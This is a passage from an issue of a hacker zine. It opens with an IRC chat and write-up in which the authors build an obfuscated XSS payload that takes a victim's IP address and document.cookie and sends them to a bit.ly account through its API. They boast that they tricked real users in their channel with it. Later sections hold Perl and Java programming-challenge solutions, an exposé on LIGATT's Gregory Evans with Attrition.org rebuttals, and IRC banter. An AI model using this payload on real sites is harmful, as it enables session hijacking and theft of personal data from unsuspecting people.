- &format=json&longUrl=http://google.com/search?q= + document.cookie
- Barney-: ah rgr
- Silks: specifically that above looks like
- Silks: String.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4
- 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,62,101,108,99,104,117,112,97,1
- 17,104,105,110,103,121,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,99,53,98,
- 101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,102,111,114,109,97,116,61,10
- 6,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,47,103,111,111,103,108,1
- 01,46,99,111,109,47,115,101,97,114,99,104,63,113,61).concat(document.cookie));
- Silks: so since I've woke up and elchu found the ip, I'm gonna combine both of them so it will store
- an IP in a bit.ly account
- Barney-: ya but in what type of attack scenario would IP be helpful?
- Silks: was saying before, obviously we can just store all this info in the same way I did with my
- XSS session stealer. call a .php and store it in a db
- Barney-: dont get me wrong its cool, just wondering application
- Barney-: could do it easier
- Barney-: and be like
- Barney-: hey visit www.silks.com/index.php?id=4 (where id isn't even a var...)
- Barney-: it'll 404, and show up in access_log
- Barney-: voila
- Silks: hence what I said above but yeah
- Silks: this is just a way of doing it without any hosting etc
- Barney-: true
- Silks: and pretty interesting to be storing info in bit.ly links
- Silks: that page wouldn't 404 if you just added a get var
- Silks: funny thing is, when you've made the full XSS you can just package it up in a bit.ly
- Silks: elchu posted it in #gny and a couple of people clicked and didn't even understand what
- happened
- Silks: specifically, Compound and jmp got XSS'ed and knew no better
- Barney-: hahah
- Barney-: a bit.ly starts the XSS
- Barney-: and ends up in a bit.ly
- Barney-: hence why I don't trust you
- Barney-: and i go curl -I silks-dumb-links.com
- Silks: almost done
- Silks: gonna own #gny
- Silks: Barney-
- Silks: mind testing this?
- Silks: http://bit.ly/e93lCU
- Silks: bit.ly/gvZPM8
- Barney-: Location: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=<script>var x = new XMLH
- ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47
- ,47,92,112,105,46,103,111,12,116,105,112,46,105,110,102,111),true);x.onreadystatechange =fu
- nction(){if(x.readyState==4){var ip = x.responseText.match(new RegExp(String.fromCharCode(9
- 2,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92
- ,100,123,49,44,51,125)));var y=new XMLHttpRequest();y.open(String.fromCharCode(71,69,84),St
- ring.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4
- 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,61,115,105,108,107,115,121,3
- 8,97,112,105,75,101,121,61,82,95,98,100,102,57,54,101,56,51,55,49,51,99,50,50,55,48,50,52,5
- 3,55,55,48,102,55,101,99,56,48,56,98,49,100,38,102,111,114,108,97,116,61,106,115,111,110,38
- ,108,111,110,103,85,114,107,61,104,116,116,112,58,47,44,103,111,111,103,108,101,46,99,111,1
- 09,47,115,101,97,114,99,104,63,113,61).concat(ip));y.send();}};x.send();</script>
- Barney-: MIME-Version: 1.0
- Barney-: Content-Length: 1177
- Barney-: how do you pass a mime-version
- Barney-: with no mime type
- Silks: probably to do with the bit.ly link
- elchupathingy: just woke up
- Silks: tricked a few people lolz
- elchupathingy: ya saw
- elchupathingy: i was happy with the ip lol
- elchupathingy: but having to add in the random ass semicolons was annoying
- Silks: I'm thinking it might be possible to use browser location tracking to grab data
- elchupathingy: probably
- Silks: you know the browser sends a list of all the access points and macs near you
- Silks: crazy shit
- Silks: then you can use those macs with google api to triangulate your position
- elchupathingy: never tried to use it
- Silks: crazy how much data your browser sends though
- elchupathingy: ya
- Silks: would be lol to XSS->triangulated position
- Silks: similar shit to what samy did
- Silks: but without being a fucking tool
- elchupathingy: heh
- elchupathingy: well you can get it but ff asks for permission to get the lat,lng
- Silks: yeah
- Silks: but if location tracking is enabled it goes through
- elchupathingy: true then its fucking simple lol
- Silks: you're fucking simple
- Silks: think only in the past 6 months-year they started asking users tbh
- elchupathingy: function loc(p) { alert( p ); }navigator.geolocation.getCurrentPosition(loc);
- elchupathingy: er
- elchupathingy: function loc(p){alert(p.coords.latitude+","+p.coords.longitude);};navigator.geolocati
- on.getCurrentPosition(loc);
- Silks: listening to that song you stole from my cookies
- d4rK3r: who is more awesome then i?
- http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest
- ()%3bx.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%
- 2c47%2c97%2c112%2c105%2c46%2c104%2c111%2c115%2c116%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue)
- %3bx.onreadystatechange%3dfunction()%7bif(x.readyState%3d%3d4)%7bvar+ip+%3d+x.responseText.match(new
- +RegExp(String.fromCharCode(92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44
- %2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c5
- 1%2c125)))%3bvar+y+%3d+new+XMLHttpRequest()%3by.onreadystatechange+%3d+function()%7bif(y.readyState%
- 3d%3d4)window.location%3dString.fromCharCode(103%2c116%2c116%2c112%2c58%2c47%2c47%2c98%2c105%2c116..
- ..d%3by.open(+String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c4
- 7%2c47%2c97%2c112%2c105%2c46%2c98%2c105%2c116%2c108%2c121%2c46%2c99%2c111%2c109%2c47%2c118%2c51%2c47
- %2c115%2c104%2c111%2c114%2c116%2c101%2c110%2c63%2c108%2c111%2c103%2c105%2c110%2c61%2c101%2c108%2c99%
- 2c104%2c117%2c112%2c97%2c116%2c104%2c105%2c110%2c103%2c...57%2c99%2c99%2c57%2c102%2c48%2c98%2c50%2c5
- 3%2c50%2c52...c61%2c106%2c115%2c111%2c110%2c38%2c108%2c111%2c110%2c103%2c85%2c114%2c108%2c61%2c104%2
- c116%2c116%2c112%2c58%2c47%2c47%2c103%2...2c97%2c114%2c99%2c104%2c63%2c113%2c61).concat(ip).concat(d
- ocument.cookie))%3by.send()%3b%7d%3b%7d%3bx.send()%3b%3c%2fscript%3e
- This XSS string is the final product of the above discussion, shown above incorporates the grabbing
- of the user's IP and cookie and utilizing the bit.ly storage method also outlined above.
- The simple bit.ly API makes this method of cookie grabbing simple and effective. Getting the cookie
- information is a simple request to the bit.ly services, and all of the relevant information will be
- returned in a XML or JSON string. Duplicate entries are effectively nulled by how bit.ly hashes the
- URL to create its shortened ones. Accounts are easily created, and thus the links and storing of
- information can be distributed amoungst many different bit.ly accounts. This makes it much harder to
- find the sole source of the links. A combination with other URL shortening services such as goo.gl,
- on.fb.me, and tinyurl can make this a very robust method of cookie stealing. The XSS string above
- can be tweaked to hide its real intentions and can effectively work against someone that does not
- question links sent to them.
- A major weakness of this technique is that it relies on JavaScript, so browsers that employ NoScript
- will not be affected, but utilizing other standard XSS techniques and server-side files could ensure
- that if you can't grab both the IP+cookie, you can at least grab an IP. As simple as this technique
- may be, there is a lot more potential for further privacy and security breaches if you can think
- outside the box. Not to mention that we think storing data in bit.ly is pretty hilarious.
- [==================================================================================================]
- -=[ 0x0c Programming Challenge
- -=[ Author: storm
- -=[ Email: storm@gonullyourself.org
- -=[ Website: http://gonullyourself.org/
- Sorry, no programming challenge this issue. If you have ideas, don't hesitate to shoot us an email.
- --------------------------------------------------------------------------------
- Last issue, we asked readers to compare the depth-first search and breadth-first search routing
- algorithms against a given graph.
- Graph Solution by melte
- Language: Perl
- --------------------
- #!/usr/bin/perl
- use strict;
- use warnings;
- my $obj = { points => build_tree(<DATA>) };
- # Uncomment for examples given in the article
- =pod
- for ('C', 'D', 'E')
- {
- my $end = breadth_first($obj, 'A', $_);
- my $mid = depth_first($obj, 'A', $_);
- print "A -> $_ : DF=$mid BF=$end\n";
- }
- exit;
- =cut
- for my $first (sort { $a cmp $b } keys %{$obj->{points}})
- {
- for my $second (sort { $a cmp $b } keys %{$obj->{points}})
- {
- my $df = depth_first($obj, $first, $second);
- my $bf = breadth_first($obj, $first, $second);
- my $message = ($df != -1 && $df < $bf)
- ? "Depth-First"
- : ($df > $bf && $bf != -1)
- ? "Breadth-First"
- : "Tie";
- print "$first -> $second : DF=$df, BF=$bf : $message\n";
- }
- }
- # The data structure I'm using is a hashref with letters as keys,
- # and an arrayref (as the value) listing its neighbours
- sub build_tree
- {
- my (@input) = @_;
- my $vertex = {};
- # Not strictly necessary but this + the check below is good for catching typos
- while ($input[0] =~ /(\w+)[,}]/g)
- {
- $vertex->{$1} = [];
- }
- while ($input[1] =~ /\{(\w+)\,(\w+)\}/g)
- {
- defined $vertex->{$1} and defined $vertex->{$2} or die "Malformed point [$1,$2]";
- push @{$vertex->{$1}}, $2;
- push @{$vertex->{$2}}, $1;
- }
- $vertex;
- }
- # Setup the structure and enter recursion
- sub depth_first
- {
- my ($obj, $start, $end ) = @_;
- $obj = { checked => [], points => $obj->{points} };
- $start eq $end and return 0;
- _depth_first($obj, $start, $end);
- }
- # Check all trees from a starting point
- sub _depth_first
- {
- my ($obj, $start, $end) = @_;
- defined $obj->{checked} or $obj->{checked} = [];
- push @{$obj->{checked}}, $start;
- for my $neighbour (sort { $a cmp $b } @{$obj->{points}{$start}})
- {
- # We can exclude previously checked items
- grep { $_ eq $neighbour } @{$obj->{checked}} and next;
- push @{$obj->{checked}}, $neighbour;
- $neighbour eq $end and return 1;
- my $counter = _depth_first($obj, $neighbour, $end);
- $counter != -1 and return $counter + 1;
- }
- return -1;
- }
- # Surely there is a pretty and short recursive way to do this
- sub breadth_first
- {
- my ($obj, $start, $end) = @_;
- $start eq $end and return 0;
- my $tree = $obj->{points}{$start};
- my $level = 0;
- @$tree = sort { $a cmp $b } @$tree;
- while (1)
- {
- ++$level;
- # This problem could exist with a discontinuous graph as input
- @$tree or return -1;
- grep { $_ eq $end } @$tree and return $level;
- # We don't want to add items and then sort
- # We want to add sorted lists to preserve correct ordering
- my $temp = [];
- for my $item ( sort { $a cmp $b } @$tree )
- {
- # Exclude the parent node in this context
- push @$temp, grep { $_ ne $item } @{$obj->{points}{$item}};
- }
- $tree = $temp;
- }
- }
- # Uncomment for smaller graph from article
- =pod
- __DATA__
- V = {A,B,C,D,E}
- E = {{A,B},{A,C},{B,C},{B,D},{B,E},{C,D},{D,E}}
- __END__
- =cut
- __DATA__
- V = {A,B,C,D,E,F,G,H}
- E = {{A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}}
- --------------------
- $ perl graph.pl
- A -> A : DF=0, BF=0 : Tie
- A -> B : DF=1, BF=1 : Tie
- A -> C : DF=5, BF=2 : Breadth-First
- A -> D : DF=4, BF=1 : Breadth-First
- A -> E : DF=6, BF=2 : Breadth-First
- A -> F : DF=3, BF=1 : Breadth-First
- A -> G : DF=2, BF=2 : Tie
- A -> H : DF=3, BF=2 : Breadth-First
- B -> A : DF=1, BF=1 : Tie
- B -> B : DF=0, BF=0 : Tie
- B -> C : DF=3, BF=3 : Tie
- B -> D : DF=2, BF=2 : Tie
- B -> E : DF=4, BF=3 : Breadth-First
- B -> F : DF=3, BF=2 : Breadth-First
- B -> G : DF=4, BF=1 : Breadth-First
- B -> H : DF=5, BF=1 : Breadth-First
- C -> A : DF=2, BF=2 : Tie
- C -> B : DF=3, BF=3 : Tie
- C -> C : DF=0, BF=0 : Tie
- C -> D : DF=1, BF=1 : Tie
- C -> E : DF=2, BF=1 : Breadth-First
- C -> F : DF=5, BF=2 : Breadth-First
- C -> G : DF=4, BF=3 : Breadth-First
- C -> H : DF=5, BF=4 : Breadth-First
- D -> A : DF=1, BF=1 : Tie
- D -> B : DF=2, BF=2 : Tie
- D -> C : DF=1, BF=1 : Tie
- D -> D : DF=0, BF=0 : Tie
- D -> E : DF=2, BF=1 : Breadth-First
- D -> F : DF=4, BF=1 : Breadth-First
- D -> G : DF=3, BF=2 : Breadth-First
- D -> H : DF=4, BF=3 : Breadth-First
- E -> A : DF=3, BF=2 : Breadth-First
- E -> B : DF=4, BF=3 : Breadth-First
- E -> C : DF=1, BF=1 : Tie
- E -> D : DF=2, BF=1 : Breadth-First
- E -> E : DF=0, BF=0 : Tie
- E -> F : DF=6, BF=2 : Breadth-First
- E -> G : DF=5, BF=3 : Breadth-First
- E -> H : DF=6, BF=4 : Breadth-First
- F -> A : DF=1, BF=1 : Tie
- F -> B : DF=2, BF=2 : Tie
- F -> C : DF=3, BF=2 : Breadth-First
- F -> D : DF=2, BF=1 : Breadth-First
- F -> E : DF=4, BF=2 : Breadth-First
- F -> F : DF=0, BF=0 : Tie
- F -> G : DF=3, BF=1 : Breadth-First
- F -> H : DF=4, BF=2 : Breadth-First
- G -> A : DF=2, BF=2 : Tie
- G -> B : DF=1, BF=1 : Tie
- G -> C : DF=4, BF=3 : Breadth-First
- G -> D : DF=3, BF=2 : Breadth-First
- G -> E : DF=5, BF=3 : Breadth-First
- G -> F : DF=4, BF=1 : Breadth-First
- G -> G : DF=0, BF=0 : Tie
- G -> H : DF=2, BF=1 : Breadth-First
- H -> A : DF=2, BF=2 : Tie
- H -> B : DF=1, BF=1 : Tie
- H -> C : DF=4, BF=4 : Tie
- H -> D : DF=3, BF=3 : Tie
- H -> E : DF=5, BF=4 : Breadth-First
- H -> F : DF=4, BF=2 : Breadth-First
- H -> G : DF=5, BF=1 : Breadth-First
- H -> H : DF=0, BF=0 : Tie
- By running this script, we can clearly see from the output that breadth-first search is the winning
- algorithm out of the two. However, this is not always the case. Some graphs will be better
- traversed by means of depth-first search, while others will not. A judgment call must be made
- depending on the specific scenario. For instance, massive graphs with a target that is many hops
- away from the origin point will more likely be searched by depth-first search simply due to resource
- limitations. Breadth-first search of a massive graph requires many layers upon layers of recursion.
- An entire "tree" must be stored in memory, which will quickly run low as the tree grows, causing
- swapping to occur or the system to crash when the available RAM hits zero. With depth-first search,
- only a single "branch" of recursion is stored in memory, requiring much less space.
- --------------------
- Additionally, as an amendment to issue #3, we missed a solution submitted by Suzaku for the
- challenge of writing any one of a number of bit adders.
- Ripple-Carry Adder by Suzaku
- Language: Java
- --------------------
- import java.util.Scanner;
- class adder{
- public static void main(String args[]){
- int bitS[],obA[],obB[],i,cin=0,cout=0;
- String bitA,bitB;
- char a,b;
- Scanner input=new Scanner(System.in);
- obA=new int[100];
- obB=new int[100];
- bitS=new int[100];
- System.out.println("Enter the bit pattern A");
- bitA=new StringBuffer(input.next()).reverse().toString();
- System.out.println("Enter the bit pattern B");
- bitB=new StringBuffer(input.next()).reverse().toString();
- if(bitA.length()==bitB.length()){
- System.out.print("Sum = ");
- for(i=0; i<bitA.length(); i++){
- obA[i]=Integer.parseInt(new Character(bitA.charAt(i)).toString());
- obB[i]=Integer.parseInt(new Character(bitB.charAt(i)).toString());
- bitS[i]=obA[i]^obB[i]^cin;
- cout=(obA[i]*obB[i])+cin*(obA[i]^obB[i]);
- cin=cout;
- }
- for(; i>0; i--)
- System.out.print(bitS[i-1]);
- System.out.print("\nCarry = "+cout);
- }
- else
- System.out.print("Length of A and B should be same");
- }
- }
- [==================================================================================================]
- -=[ 0x0d The Scoop on LIGATT
- LIGATT Security International (more commonly known as just LIGATT) is a security company founded and
- run by the (in)famous Gregory D. Evans. Evans is mainly known for his claim of being the "world's
- number 1 hacker" and his ability to teach anyone to be the same in 15 minutes through one of his
- company's educational courses. Much controversy surrounds Evans and his company with allegations of
- severe debt, shady marketing schemes, and and overall lack of security knowledge necessary to
- provide consulting services of any capacity. Attrition.org claims that Evans is currently in debt
- of over $9,000,000 USD, and the Better Business Bereau currently lists LIGATT as an 'F' rating.
- Evans denies all counts of misdoing and considers himself a wealthy, successful businessman.
- In mid-January, Go Null Yourself Zine contacted LIGATT to request an interview with Evans. After a
- few days of conversation with Evans' PR assistant, the interview request was accepted. The
- interview spanned across two days (due to phone difficulties) and about 2 hours and 10 minutes of
- conversation was recorded. A detailed look at Evans' past was provided, and many shots were taken
- at the people and organizations calling him a fraud.
- There are simply too many details from the interview to enumerate here, so we have instead made the
- recordings public at http://www.gonullyourself.org/zine/4/ligatt for those who are interested.
- After the interview, we contacted Attrition.org to get their take on everything told to us by Evans.
- We provided a list of key claims made by Evans, and this is their reply:
- All of this is the best of my memory, or with citation if I have it.
- : Evans lived in Germany in his youth and got in trouble for changing a
- : friend's grades. The father of this friend, who was a lawyer, hired
- : Evans (as a kid) to break into the computers of a competing law firm.
- I think this is partially new. The 'changing grades' claim has been made
- before, but not with additional details above.
- : In 1994, Evans operated the 4th or 5th largest ISP in the country named
- : Connect America financed by money made from hacking side-jobs. (I am
- : unsure if he meant in America or Germany)
- In the US, in California. Claims of the size are unverified, and I doubt
- they can be. The part about making money from hacking side-jobs is likely
- BS. During this time with Connect America, he was stealing phone lines and
- reselling them. This is basic toll fraud, and what lead him to getting
- busted and serving 2 years in prison.
- http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf
- : Evans was friends with Kevin Mitnick in California, and they learned
- : about computers and phreaking together.
- This is a lie. Kevin Mitnick confirmed that while they were on the same
- floor of the LA detention center, they did not share a cell (as previously
- claimed by Evans), did not share any hacking / phreaking information, and
- did not learn from each other. Mitnick described Evans as someone who
- didn't seem to know much about hacking and asked basic questions. You can
- confirm this with a mail to Mitnick, and some of it covered here:
- http://attrition.org/errata/charlatan/gregory_evans/evans09.html
- http://twitter.com/kevinmitnick/statuses/16428972158
- http://twitter.com/kevinmitnick/statuses/16429370781
- : Evans has 100 employees and has hired people in Pakistan and India.
- This is hard to positively debunk, but I am relatively sure he does not
- have 100 employees currently. He has likely had 100 historically, but has
- a very high turnover rate. His claims of consultants in other countries
- make this basically impossible to verify, especially since he has not
- published financials for 2010 as required by the SEC.
- : The term "number 1 hacker" came from Mr. Morris, the FBI agent that
- : arrested Evans, who described Evans as on the "top 10 list of number 1
- : hackers."
- This is a new claim (re: Morris), but based on my experience with the FBI
- seems absurd. Evans was convicted of toll fraud, not really 'hacking'. At
- that time, the FBI had seen some pretty high end / impressive hacking, and
- what Evans was doing didn't come close.
- : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
- : a $4 million house.
- None of this can be verified so far, and we've tried. Given the apartments
- he has lived in for the last 2 years, as verified by ex employees, it is
- unlikely he has had any significant money to do this. Based on court
- records we have published, he likely has never actually had 1 million
- dollars, just serious debt, including the ~ 10 million he still owes. Even
- now, he owes serious money not only for the previous crimes, but as a
- result of his business dealings the last few years. We have some of the
- records:
- http://attrition.org/errata/charlatan/gregory_evans/ligatt15/
- A summary of his debt:
- http://attrition.org/errata/charlatan/gregory_evans/evans21.html
- : Evans's book "Laptop Security" sold 150,000 copies.
- We have not heard this claim. However, search Amazon for that title and
- look how many are available new/used, and it is likely false. It's curious
- he is focusing on that book, as all of his previous claims centered around
- the 'No 1 Hacker' book.
- : The material found online in Evans's "No. 1 Hacker" book was not
- : copyrighted and therefore was not legally forbidden to use.
- This is patently false. The material he found online *was* copyrighted,
- even if the work did not explicitly say it was. This is copyright 101.
- There is currently a group of the authors that are still considering
- taking action against him. I have personally read mails from half a dozen
- of these authors that confirm they hold the copyright, and that they did
- NOT give him permsission or sell it to him (as he claimed in other
- sources). A mail to Simple Nomad of NMRC will confirm this as one of the
- authors (who will reply and confirm, while others will not due to
- potential legal action).
- : Evans was contracted to set up a CCTV camera network at a county prison
- : while on probation.
- Never heard this claim, but given how prisons work (and two direct family
- members that worked in that system), this is very dubious.
- : Evans has committed "every type of high-tech crime you can ever think of
- : before [he] was 26-years-old."
- Again, his conviction was for basic toll fraud. This doesn't suggest any
- level of skill that would back this claim.
- : In 1998, Evans was interrogated by the authorities regarding a
- : system-wide crash of the SkyTel pager network.
- No way to verify this short of a FOIA request for that case. I have not
- heard this claim before.
- : Every time Evans was caught by the authorities, it was because someone
- : else snitched on him.
- The current court records do not suggest this. They do suggest that Evans
- was a snitch (see Mitnick's presentation last year about the topic). We
- have the docket for his big case online, and there is no mention of a
- snitch.
- http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf
- http://attrition.org/errata/charlatan/gregory_evans/ligatt07/
- : "High-tech grand theft" is a new state crime that was formed
- : specifically because of Evans's actions.
- There is no state law that uses those words I bet =) Did he mean Georgia?
- How 'new'? This would be easy to verify unless he further spins the claim.
- : There are plenty more points, but there's just too much stuff to listen
- : to. It's not too bad of a list, anyways.
- As usual, and it isn't just Evans, these types of claims are almost always
- made without any real detail, no verification from HIM, etc.
- Unfortunately, a lot of these are new claims or have new elements we
- haven't seen.
- : I have also attached an email that Evans forwarded to me that may be of
- : interest to you. Thank you again for your time, and I look forward to
- : your response to these claims.
- Yep, np! If you want to run any other claims by me, feel free. I will be
- offline for about 24 hours starting Thursday as I fly back to the states.
- As for the e-mail, I have read it before actually via Don. It was not
- published on attrition.org because it is irrelevant to Evans' claims.
- Because he offered to buy a web site, doesn't mean any deal was made
- regarding publishing material written by Don. It does not speak to any
- agreement, purchase or transfer of copyright of text included in Evans
- book. So yes, it wasn't included on our site =) As always, showing one
- thing that is marginally related to a piece of another story isn't proof,
- but it is an essential tool in a con.
- - jericho
- The attached email mentioned above can be read here. Evans forwarded this to us after the interview:
- Sorry we got disconnected. Here is proof that I sent Donald an email asking to buy his website
- 6 months before hand. Proving that there was no malicious intent. This is the stuff that they
- did not put on Attrition.org. Also if you want to finish up just let me no.
- Begin forwarded message:
- > From: "EH-Net-Don" <don@ethicalhacker.net>
- > Date: December 17, 2009 12:15:13 PM EST
- > To: "'Gregory Evans'" <gregoryevans@ligatt.com>
- > Subject: [SPAM] RE: Purchase of Ethical Hacker Network
- > Reply-To: <don@ethicalhacker.net>
- >
- > Hey Gregory,
- >
- > Thank you very much for your kind words. It’s never a bad thing to have your blood, sweat and
- > tears get recognized in a positive way. Although I’m not sure selling is my desire at the
- > moment, I’m always willing to talk business and make new friends in the industry. Either way,
- > you might be interested in getting the word out about your company and its products and
- > services to a wider ethical hacking community. Maybe we could also chat about advertising on
- > my site and/or supporting my ethical hacking conference, ChicagoCon. How’s that for a reverse
- > pitch? ;-)
- >
- > If you don’t mind me asking, how did you find out about us?
- >
- > Looking forward,
- > Don
- >
- > PS – There’s a typo in you LA address. Guess I can’t stop being an editor. J
- > Donald C. Donzal, CISSP, MCSE 2003, CEH, Security+ SME
- > The Digital Construction Company
- > 1520 Heidorn Ave.
- > Westchester, IL 60154
- > 708.837.3002 (Cell)
- > Founder & Organizer
- > ChicagoCon
- > Editor-In-Chief
- > The Ethical Hacker Network
- >
- >
- >
- > From: Gregory Evans [mailto:gregoryevans@ligatt.com]
- > Sent: Wednesday, December 16, 2009 11:38 PM
- > To: don@ethicalhacker.net
- > Subject: Purchase of Ethical Hacker Network
- >
- > Hello Donzal,
- >
- > My name is Gregory Evans the CEO of LIGATT Security International (www.ligatt.com). I am very
- > impressed with your website Ethical Hacker Network. I would love to speak to you sometime
- > about purchasing the website and still having you run the site. If you are interested please
- > feel to contact me at 866-354-4288 Ext. 5673.
- >
- > Have a Blessed Day,
- >
- > Gregory Evans
- > President / CEO
- >
- > 866-354-4288 Ext. 5673
- >
- > Atlanta:
- > 6050 Peachtree Parkway
- > Suite 200
- > Norcross, Ga 30092
- >
- > Los Angeles:
- > 11209 Naitonal Blvd.
- > Suite 178
- > Los Angeles, Ca 90292
- >
- Have a Blessed Day,
- Gregory Evans
- President / CEO
- Ring: 866-354-4288 Ext. 5673
- Look: www.LIGATT.COM
- Follow: www.twitter.com/ligatt
- Post: www.facebook.com/GregoryDEvans
- Atlanta
- 6050 Peachtree Parkway
- Suite 200
- Norcross, Ga 30092
- As if there wasn't enough drama already, on February 2, a message was broadcasted to the Full-
- Disclosure mailing list detailing the compromise of Evans' websites and email accounts, leaking
- hordes of personal and confidential information. We, personally, have taken little time to look
- through the leak and aren't able to better confirm or deny any claims made by Evans. There is most
- likely much to learn, though, according to Jericho:
- : Thank you very much for providing insight on these claims. Would it be
- : okay to publish this email in the zine? I think it would be interesting
- : to place this side-by-side with the interview.
- Yep, feel free. Also note, that with recent events (Evans' entire mail
- spool being leaked / published), some of these claims may be more
- thoroughly debunked in the coming weeks. As an example, his mail spool
- shows that he did register thecyberwars.com despite repeated claims he had
- nothing to do with it.
- : > : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
- : > : a $4 million house.
- : >
- : > None of this can be verified so far, and we've tried. Given the apartments
- : > he has lived in for the last 2 years, as verified by ex employees, it is
- A recent mail leaked from his spool shows that he could not even rent an
- apartment under his mom's name after they performed due diligence. When
- confronted with it, Evans libels attrition:
- http://pastebin.com/J4JeG2W8
- : > A summary of his debt:
- : >
- : > http://attrition.org/errata/charlatan/gregory_evans/evans21.html
- Updated with another entry since this mail.
- Also,
- : Additionally, I found these the other day; you may also find them wildly
- : amusing:
- :
- : http://www.theregister.co.uk/2011/01/31/ligatt_security_subpoena_quashed/
- Already posted on the charlatan page.
- : http://www.escapistmagazine.com/news/view/107413-Computer-Hackers-Getting-Their-Own-Reality-Show
- He claims his life story was bought for a movie, that never materialized.
- As I tweeted the other day:
- Hey @GregoryDEvans or @LIGATT .. any comment on why the last movie deal
- went nowhere? http://in.sys-con.com/node/927014
- If he did get a reality show, why doesn't he name the network / company
- that bought it?
- And,
- : ?I have to be modest and say that we at LIGATT could not have been able
- : to do this without the help of Chris John Riley, Kris French, Sam Bowne,
- : Elizabeth Summers, Atrrion.org, Crabbybastard.com and all the other
- : people who kept our name relevant. What sealed the deal for us and got
- : the networks to say, ?lets do it? was ?LIGATTleaks?. Again, I have shown
- : that what people may say about you or try to do to you does not stand in
- : the way of my success. Success it the best revenge,? says Evans.
- :
- : Thought that was funny.
- Yep, that is his new strategy for the last few weeks, he said the same
- thing in one of his recent video blogs as well.
- -=-=-
- If you would like to weigh in on the interview, the LIGATT controversy, or anything related to
- LIGATT, Gregory D. Evans, or the leak, our contact information is in the introduction - we will
- publish intelligent arguments and opinions (both for and against) in the next issue.
- [==================================================================================================]
- -=[ 0x0e Et Cetera, Etc.
- -=[ Author: teh crew
- In the absence of any real miscellaneous content, why not take a look at some of the shenanigans
- that go on in the good 'ol #gny.
- We're competent! We promise!
- ----------------------------------------------------------------------------------------------------
- [16:22] <GNY'oliverjhudson93> It is expected on February 3rd, 2011, that there will be a formal
- announcement in the US that IPv4 addresses have been completely exhausted
- [16:23] <GNY'connection> yes
- [16:23] <GNY'connection> but they finished today
- [16:23] <GNY'oliverjhudson93> who got the last one?
- [16:23] <GNY'connection> fucked if i know
- [16:23] <GNY'oliverjhudson93> was it 999.999.999.999
- [16:23] <GNY'connection> but I would sell it
- [16:23] <GNY'connection> oliverjhudson93, I hope you are trolling
- [16:23] <GNY'connection> cause otherwise
- [16:23] <GNY'connection> that was the most retarded thing
- [16:23] <GNY'connection> I have ever heard
- [16:23] <GNY'oliverjhudson93> nah i'm pulling your leg :P
- [16:23] <GNY'connection> good
- [16:23] <GNY'oliverjhudson93> (im joking)
- [16:24] <Silks> cough liar
- [16:24] <GNY'connection> you are joking about lying?
- [16:24] <GNY'oliverjhudson93> i'm joking about joking?
- [16:24] <GNY'oliverjhudson93> I don't know anymore
- [16:24] <GNY'oliverjhudson93> I'm gonna DDoS 127.0.0.1 D:
- [16:25] <GNY'connection> oliverjhudson93, what is the highest IP someone could have?
- [16:25] <GNY'connection> not even taking into account the limits set in place for broadcasts blah
- blah blah
- [16:25] <GNY'connection> straight up, highest IP address
- [16:25] <GNY'oliverjhudson93> 255
- [16:26] <GNY'oliverjhudson93> I don't actually know
- [16:26] <GNY'oliverjhudson93> but i figure
- [16:26] <GNY'oliverjhudson93> 255.255.255.255?
- [16:26] <GNY'oliverjhudson93> but thats like
- [16:26] <GNY'oliverjhudson93> subnet mask or some shit that I don't understand
- [16:26] <GNY'connection> technically it's 256.256.256.256
- [16:26] <GNY'connection> but as we have limits imposed
- [16:26] <GNY'connection> yes
- [16:26] <GNY'connection> 255.255.255.255
- [16:26] <GNY'oliverjhudson93> See I dun goof'd!
- [16:27] <Silks> urr no
- [16:27] <Silks> it is 0-255
- [16:27] <GNY'connection> yea I fubar'd
- [16:27] <Silks> because that is the range of values you can store in an 8bit number
- [16:27] <GNY'connection> you don't know
- [16:27] <GNY'connection> how hard
- [16:27] <GNY'connection> I headdesked
- [16:27] <GNY'connection> after I typed that
- [16:27] <GNY'oliverjhudson93> :P
- [16:27] <Silks> I am embarrassed for you
- [16:27] <GNY'connection> and was hoping no one would catch it
- A shitty situation
- ----------------------------------------------------------------------------------------------------
- [21:58] <&elchupathingy> storm would you be pissed if i took a shit on your porch?
- [22:05] <~Silks> what if I were to?
- [22:06] <&storm> i would be curious to see that since i don't have a porch
- [22:06] <~Silks> what do you have that I could shit on?
- [22:07] <&storm> the dorm building has a stoop, i guess
- [22:07] <&storm> well, not really actually
- [22:08] <~Silks> what about siblings?
- [22:08] <~Silks> do you have a sister?
- [22:08] <&storm> i'm an only child
- [22:08] <&storm> :(
- [22:08] <~Silks> ditto
- [22:08] <~Silks> however that means you have a lot of stuff
- [22:08] <~Silks> and therefore a lot of things to be fouled
- [22:09] <&storm> this is very true
- [22:10] <&elchupathingy> what if
- [22:10] <&elchupathingy> we built a porch
- [22:10] <&elchupathingy> then shit on it
- [22:10] <&storm> i like your thinking
- GTFO emo storm
- ----------------------------------------------------------------------------------------------------
- [01:12] <storm> sometimes i message myself to check if i'm still connected
